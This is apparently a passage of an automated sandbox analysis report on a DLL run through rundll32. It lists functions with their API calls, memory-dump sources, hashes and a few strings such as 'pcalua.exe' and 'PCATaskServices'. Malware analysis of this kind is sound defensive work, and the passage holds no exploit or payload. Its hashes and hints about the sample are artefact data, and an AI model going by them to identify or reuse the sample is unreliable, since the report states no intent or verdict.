                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: __fread_nolock
                  • String ID: %sk$PCATaskServices$PT32S$pcalua.exe
                  • API String ID: 2638373210-541710397
                  • Opcode ID: 93ed09e847bc4bcd7e1a10286dd3b184cde09ab031ad6cf8d039585eae59893c
                  • Instruction ID: 33a573849c30ce536214a39ab89cc6ccbf498b23aaf1faddf216a5cb1ae97be1
                  • Opcode Fuzzy Hash: 93ed09e847bc4bcd7e1a10286dd3b184cde09ab031ad6cf8d039585eae59893c
                  • Instruction Fuzzy Hash: B5C19572900249ABDF15DFA4CC45BEE77B4FF08308F154119E915BB7A0EB749A0ACBA1
                  Function 6CDF444F Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(00000001,?,6CDF43CD,6CDF33F7,6CDF2DC4,?,6CDF2FFC,?,00000001,?,?,00000001,?,6CE11F78,0000000C,6CDF30F5), ref: 6CDF445D
                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CDF446B
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CDF4484
                  • SetLastError.KERNEL32(00000000,6CDF2FFC,?,00000001,?,?,00000001,?,6CE11F78,0000000C,6CDF30F5,?,00000001,?), ref: 6CDF44D6
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorLastValue___vcrt_
                  • String ID:
                  • API String ID: 3852720340-0
                  • Opcode ID: 7c34103202058e9c109f043cd923a0c0f43cbf135862b2b6b901cdfdb1025db5
                  • Instruction ID: c5c4dc36d06cfabf014f882ef020fbe85c651f24d1d169326bb09731bceb14c5
                  • Opcode Fuzzy Hash: 7c34103202058e9c109f043cd923a0c0f43cbf135862b2b6b901cdfdb1025db5
                  • Instruction Fuzzy Hash: 2C01283230D611ADAA001B756E8565B37B4FB0237C722432EF57452DF0FF92482B4194
                  Function 6CE06DA4 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                  Download Yara Rule
                  APIs
                  • __alloca_probe_16.LIBCMT ref: 6CE06E29
                  • __alloca_probe_16.LIBCMT ref: 6CE06EF2
                  • __freea.LIBCMT ref: 6CE06F59
                    • Part of subcall function 6CDFE25E: HeapAlloc.KERNEL32(00000000,6CE02423,?,?,6CE02423,00000220,?,?,?), ref: 6CDFE290
                  • __freea.LIBCMT ref: 6CE06F6C
                  • __freea.LIBCMT ref: 6CE06F79
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: __freea$__alloca_probe_16$AllocHeap
                  • String ID:
                  • API String ID: 1096550386-0
                  • Opcode ID: 53104b49fcb10f8949d789a013479e9623a108b507c3814dab78e362bf678a22
                  • Instruction ID: 2e7b02de5a7d3c899db5fc23a150b96ac2ec42c0c04379bb547c7650deaa65d5
                  • Opcode Fuzzy Hash: 53104b49fcb10f8949d789a013479e9623a108b507c3814dab78e362bf678a22
                  • Instruction Fuzzy Hash: 6651B072711606ABEB108F648C86FAB3BBDEF4565CB310129FD14DAA50E730CCA5C6E0
                  Function 6CDF452F Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • mydllmain.UIFTTNKL2R(6CE12080,00000010,6CDF46A1,?,?,?,?,6CE120A0,00000008,6CDF4725,?,?,?,00000000), ref: 6CDF458E
                  • ___AdjustPointer.LIBCMT ref: 6CDF45F6
                  • ___AdjustPointer.LIBCMT ref: 6CDF4619
                  • ___AdjustPointer.LIBCMT ref: 6CDF46B5
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: AdjustPointer$mydllmain
                  • String ID:
                  • API String ID: 3586548312-0
                  • Opcode ID: 7c5805ce92dfc8a1440261eb806d3e816d7bb23834e4b7da1578dcb81c377faf
                  • Instruction ID: dca39e9f974f2c2877948a5696615083e4b316848623e6c8a5cdd41c4b8ddfd0
                  • Opcode Fuzzy Hash: 7c5805ce92dfc8a1440261eb806d3e816d7bb23834e4b7da1578dcb81c377faf
                  • Instruction Fuzzy Hash: 8E51CF72606206DFEB158F10CA50BEA73B4BF44319F224529E8354BAB0E731E956CB50
                  Function 6CDF2FA3 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: dllmain_raw$dllmain_crt_dispatch
                  • String ID:
                  • API String ID: 3136044242-0
                  • Opcode ID: c8a43bad49934fcb264cb8c1e18061eb8d75ac0962ba0dfd020b45c5d0194c24
                  • Instruction ID: 7ef8648142c4f702bf3fbfdc3d79709bca4c5f14efa4f17dcaeafa7a92282e2e
                  • Opcode Fuzzy Hash: c8a43bad49934fcb264cb8c1e18061eb8d75ac0962ba0dfd020b45c5d0194c24
                  • Instruction Fuzzy Hash: 0A21A2B1901A55EADB214F56C848AAF3A79BB84B9CB174116F8345BB30D3318D038BA1
                  Function 6CDF5562 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6CDF5513,00000000,?,00000001,?,?,?,6CDF5602,00000001,FlsFree,6CE0BCD8,FlsFree), ref: 6CDF556F
                  • GetLastError.KERNEL32(?,6CDF5513,00000000,?,00000001,?,?,?,6CDF5602,00000001,FlsFree,6CE0BCD8,FlsFree,00000000,?,6CDF4524), ref: 6CDF5579
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6CDF55A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: LibraryLoad$ErrorLast
                  • String ID: api-ms-
                  • API String ID: 3177248105-2084034818
                  • Opcode ID: 26d0bcda0daf060657cf9922a09ee87ac861555935ead9fdc94cf7d382fb54f7
                  • Instruction ID: d68f2693b1a365badb6a4ae4511271442a115e96ca9cc4a1433ae5d21e571346
                  • Opcode Fuzzy Hash: 26d0bcda0daf060657cf9922a09ee87ac861555935ead9fdc94cf7d382fb54f7
                  • Instruction Fuzzy Hash: 19E04F30B4420CFBEF111FA1DC05B493B76BB02B58F258020F92CE89E1FB63952186C8
                  Function 6CE00698 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetConsoleOutputCP.KERNEL32(42800FE9,00000000,00000000,?), ref: 6CE006FB
                    • Part of subcall function 6CE029F7: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CE06F4F,?,00000000,-00000008), ref: 6CE02A58
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6CE0094D
                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CE00993
                  • GetLastError.KERNEL32 ref: 6CE00A36
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                  • String ID:
                  • API String ID: 2112829910-0
                  • Opcode ID: bc68c3bd2bc26256e110de4a282d6b772efef14b899b45227811403e54d8451e
                  • Instruction ID: 2d6a87b8e55e569e0540d40fa4379cc16b0c1aa0be63e6f0242588881d453619
                  • Opcode Fuzzy Hash: bc68c3bd2bc26256e110de4a282d6b772efef14b899b45227811403e54d8451e
                  • Instruction Fuzzy Hash: ADD18D75E042889FDF01CFA8C8809EDBBB5FF49314F24416AE465EBB51E730A952CB90
                  Function 6CE08E93 Relevance: 6.1, APIs: 4, Instructions: 147COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,6CE087FF), ref: 6CE08EAC
                  • mydllmain.UIFTTNKL2R(00000001,?,?), ref: 6CE09020
                  • mydllmain.UIFTTNKL2R(00000002,?,?), ref: 6CE09066
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: mydllmain$DecodePointer
                  • String ID:
                  • API String ID: 253863441-0
                  • Opcode ID: 64c69bc371721079bdc1bf258f2505dcba8f2cd72626474b2ed07cb28abb47f4
                  • Instruction ID: f36482295d6ae8d1249328a3bfa198cc7fe444f9f309419e268ec8cee64289aa
                  • Opcode Fuzzy Hash: 64c69bc371721079bdc1bf258f2505dcba8f2cd72626474b2ed07cb28abb47f4
                  • Instruction Fuzzy Hash: EA516E71B0450ECBCF108FA9D84A2AD7B75FF46318F310146E490AAF65CB758576CB94
                  Function 6CE01746 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 6CE029F7: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CE06F4F,?,00000000,-00000008), ref: 6CE02A58
                  • GetLastError.KERNEL32 ref: 6CE017AA
                  • __dosmaperr.LIBCMT ref: 6CE017B1
                  • GetLastError.KERNEL32(?,?,?,?), ref: 6CE017EB
                  • __dosmaperr.LIBCMT ref: 6CE017F2
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                  • String ID:
                  • API String ID: 1913693674-0
                  • Opcode ID: 05327dd2c701c0f1a7c116ec7e5a8d3fefa493dd10110a8d0609399f618fc631
                  • Instruction ID: e4e178805b4d84699e39adf2c7582494381897765bbe1f4bcf2c3237eedc91e5
                  • Opcode Fuzzy Hash: 05327dd2c701c0f1a7c116ec7e5a8d3fefa493dd10110a8d0609399f618fc631
                  • Instruction Fuzzy Hash: 1921A131704709AF8B119FE6888099BB7B9FF0236D728461DE8249BF50E735ED6587E0
                  Function 6CE02A9A Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                  Download Yara Rule
                  APIs
                  • GetEnvironmentStringsW.KERNEL32 ref: 6CE02AA2
                    • Part of subcall function 6CE029F7: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CE06F4F,?,00000000,-00000008), ref: 6CE02A58
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CE02ADA
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CE02AFA
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                  • String ID:
                  • API String ID: 158306478-0
                  • Opcode ID: 646016e230ab1faf1221836b8924076f2170056eae2348ccc58a57dc8f990b7d
                  • Instruction ID: bc299266615f033433fceab422444576d3a487d0c7add8bbb701df64d653b1af
                  • Opcode Fuzzy Hash: 646016e230ab1faf1221836b8924076f2170056eae2348ccc58a57dc8f990b7d
                  • Instruction Fuzzy Hash: F411C8B1B016167FAA211BB59C8CCAF79FCEF6A29C7250118F810D2600FF61DE2685F5
                  Function 6CE07FFD Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • WriteConsoleW.KERNEL32(00000000,00000000,6CDFB3AB,00000000,00000000,?,6CE06691,00000000,00000001,?,?,?,6CE00A8A,?,00000000,00000000), ref: 6CE08014
                  • GetLastError.KERNEL32(?,6CE06691,00000000,00000001,?,?,?,6CE00A8A,?,00000000,00000000,?,?,?,6CE01064,00000000), ref: 6CE08020
                    • Part of subcall function 6CE07FE6: CloseHandle.KERNEL32(FFFFFFFE,6CE08030,?,6CE06691,00000000,00000001,?,?,?,6CE00A8A,?,00000000,00000000,?,?), ref: 6CE07FF6
                  • ___initconout.LIBCMT ref: 6CE08030
                    • Part of subcall function 6CE07FA8: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CE07FD7,6CE0667E,?,?,6CE00A8A,?,00000000,00000000,?), ref: 6CE07FBB
                  • WriteConsoleW.KERNEL32(00000000,00000000,6CDFB3AB,00000000,?,6CE06691,00000000,00000001,?,?,?,6CE00A8A,?,00000000,00000000,?), ref: 6CE08045
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                  • String ID:
                  • API String ID: 2744216297-0
                  • Opcode ID: 37fe1c7d61852559f6f74be2488bb471c1462b4f644afdb947b44810a8cd1f59
                  • Instruction ID: ae0e8ae2bedb407b99114540c7c5e66b801302afc096c9d5f94265ab553b0e30
                  • Opcode Fuzzy Hash: 37fe1c7d61852559f6f74be2488bb471c1462b4f644afdb947b44810a8cd1f59
                  • Instruction Fuzzy Hash: 85F09236B45118BBCF221E96CC09A8A3F76FB0A3A5F145514FA2996660D7328930DBD4
                  Function 6CDF4B2B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • EncodePointer.KERNEL32(00000000,?), ref: 6CDF4B50
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: EncodePointer
                  • String ID: MOC$RCC
                  • API String ID: 2118026453-2084237596
                  • Opcode ID: ce801cd692d3be67632b8fe6154fac62e3d0384acc0ec761ea2b0578f3760996
                  • Instruction ID: a584b4cf2513032bfd38ae0f042e7a4af276e18fcecbe1849f6c396b7004ec98
                  • Opcode Fuzzy Hash: ce801cd692d3be67632b8fe6154fac62e3d0384acc0ec761ea2b0578f3760996
                  • Instruction Fuzzy Hash: C1417C72900209EFDF06CF94CE90AEE7BB5FF48308F164159F9286B621D3359A52DB61
                  Function 6CDFFA63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • mydllmain.UIFTTNKL2R(00000FA0,-00000020,6CE00071,6CE00071,-00000020,00000FA0,00000000,00000000,?,?), ref: 6CDFFA93
                  • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,6CE00071,-00000020,00000FA0,00000000,00000000,?,?), ref: 6CDFFAA3
                  Strings
                  • InitializeCriticalSectionEx, xrefs: 6CDFFA73
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: CountCriticalInitializeSectionSpinmydllmain
                  • String ID: InitializeCriticalSectionEx
                  • API String ID: 3077948437-3084827643
                  • Opcode ID: da1736f322bb6d95879742bd3d230748d53592139b0e112d7ba787c49aaf225f
                  • Instruction ID: e9e583202fbbc44453027d5fa05d0c3820dc0eea9fef5a97acb3218950ce6ff5
                  • Opcode Fuzzy Hash: da1736f322bb6d95879742bd3d230748d53592139b0e112d7ba787c49aaf225f
                  • Instruction Fuzzy Hash: 49E0653AA41118FBCF112FA4CC08D9E7F71FB04760B118820F92819A20C7328971EBE0
                  Function 6CDFFA21 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • mydllmain.UIFTTNKL2R(?,00000001,6CDF5FC1,00000001,?,6CDFBC5B,?,?,?,?,?,00000000,6CDFA99A,?,00000000,00000001), ref: 6CDFFA4E
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: mydllmain
                  • String ID: FlsSetValue$ccs
                  • API String ID: 979097349-2990521015
                  • Opcode ID: 5aac5473019fc6fd40fc656be20b0dc786fb63fcddf97eb1e833f838aeeb006b
                  • Instruction ID: b1cd2b101636d16eb44f062e61b34da374df09e6815f4be88b3fe25491bfc26e
                  • Opcode Fuzzy Hash: 5aac5473019fc6fd40fc656be20b0dc786fb63fcddf97eb1e833f838aeeb006b
                  • Instruction Fuzzy Hash: 2BE0CD32F4102CB3C61027859C08ED7BF75F7407B2B118461FE2465721DA325931C7D0
                  Function 6CDFF964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22memoryCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: Allocmydllmain
                  • String ID: FlsAlloc
                  • API String ID: 2444374858-671089009
                  • Opcode ID: 48b098a2ba1b1b700a4fa5a18037902422f65498037332ec06771489e4415e0b
                  • Instruction ID: 67a4105f989c2954a36a5debe8df89624b72cb9b2c8e13de425874eee37125d0
                  • Opcode Fuzzy Hash: 48b098a2ba1b1b700a4fa5a18037902422f65498037332ec06771489e4415e0b
                  • Instruction Fuzzy Hash: 0EE0C236B81228B38A2033508C09A9F7E74EB51765B124420F92851B51CB715922C2E5